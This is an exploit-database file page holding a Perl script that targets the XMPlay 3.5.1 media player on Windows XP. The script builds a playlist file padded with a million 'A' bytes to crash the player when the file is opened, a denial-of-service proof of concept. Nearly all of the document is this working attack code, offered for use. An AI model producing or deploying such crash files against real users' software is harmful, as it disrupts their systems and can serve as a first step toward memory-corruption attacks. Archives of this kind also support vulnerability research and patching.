exploit-db-mirror/exploits/windows/dos/14515.pl
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

14 lines
No EOL
338 B
Perl
Executable file

#!/usr/bin/perl
# Xmyplay 3.5.1
# Author: s-dz , s-dz@hotmail.fr
# Download : http://us2.un4seen.com/files/xmplay35.zip
# Tested : Windows XP SP2 (fr)
# DATE : 2010-07-31
my $file= "mahboul-3lik00.m3u";
my $junk= "\x41" x 1000000;
open($FILE, ">$file");
print($FILE $junk);
close($FILE);
print("exploit created successfully");